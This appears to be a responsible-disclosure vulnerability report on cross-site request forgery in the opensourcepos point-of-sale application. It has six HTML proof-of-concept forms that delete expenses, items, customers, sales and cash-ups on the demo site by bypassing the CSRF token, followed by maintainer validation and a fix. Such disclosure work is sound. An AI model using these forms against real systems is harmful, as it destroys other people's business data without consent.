Cross-Site Request Forgery (CSRF) in opensourcepos/opensourcepos

Valid

Reported on

Sep 28th 2021

Description

in some delete actions I change the HTTP request method to GET and Also remove the CSRF token from request and then I able to Bypass your CSRF protection.

Occurrences

//PoC.html

<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="https://demo.opensourcepos.org/expenses/delete">
      <input type="hidden" name="ids&#91;&#93;" value="1" />
      <input type="hidden" name="csrf&#95;ospos&#95;v3" value="" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

with this PoC.html attacker able to delete any Expenses with ids[] 1 and can be increased with any more id.

//PoC.html

<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="https://demo.opensourcepos.org/items/delete">
      <input type="hidden" name="ids&#91;&#93;" value="37" />
      <input type="hidden" name="csrf&#95;ospos&#95;v3" value="" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

with this PoC.html attacker able to delete item with ids[] 37 and also more.

//PoC.html

<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="https://demo.opensourcepos.org/expenses_categories/delete">
      <input type="hidden" name="ids&#91;&#93;" value="2" />
      <input type="hidden" name="csrf&#95;ospos&#95;v3" value="" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

with this PoC.html attacker able to delete any expenses categories with ids[] 2 and any more id.

//PoC.html

<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="https://demo.opensourcepos.org/customers/delete">
      <input type="hidden" name="ids&#91;&#93;" value="7" />
      <input type="hidden" name="csrf&#95;ospos&#95;v3" value="" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

with this PoC.html attacker able to delete any Customers with ids[] 7 and can be increased with any more id.

For delete Sales You don't have any CSRF protection

//PoC.html

<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="https://demo.opensourcepos.org/sales/delete_item/1">
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

with this PoC.html attacker able to delete sale with id 1

//PoC.html

<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="https://demo.opensourcepos.org/cashups/delete">
      <input type="hidden" name="ids&#91;&#93;" value="1" />
      <input type="hidden" name="csrf&#95;ospos&#95;v3" value="" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

with this PoC.html attacker able to delete any Cash Ups with ids[] 1 and can be increased with any more id.

We have contacted a member of the opensourcepos team and are waiting to hear back 2 years ago
amammad modified the report
2 years ago
opensourcepos/opensourcepos maintainer validated this vulnerability 2 years ago
amammad has been awarded the disclosure bounty
The fix bounty is now up for grabs
jekkos marked this as fixed with commit ea879f 2 years ago
jekkos has been awarded the fix bounty
This vulnerability will not receive a CVE
Sales.php#L1-L1569 has been validated
Expenses.php#L1-L183 has been validated
Items.php#L1-L1227 has been validated
Customers.php#L1-L465 has been validated
Cashups.php#L1-L246 has been validated
jekkos
2 years ago

Maintainer

Hi, I have deployed a fix on dev.opensourcepos.org now.. The app now blocks GET requests for the methods you have enumerated here

0x9x
2 years ago

Nice find !

to join this conversation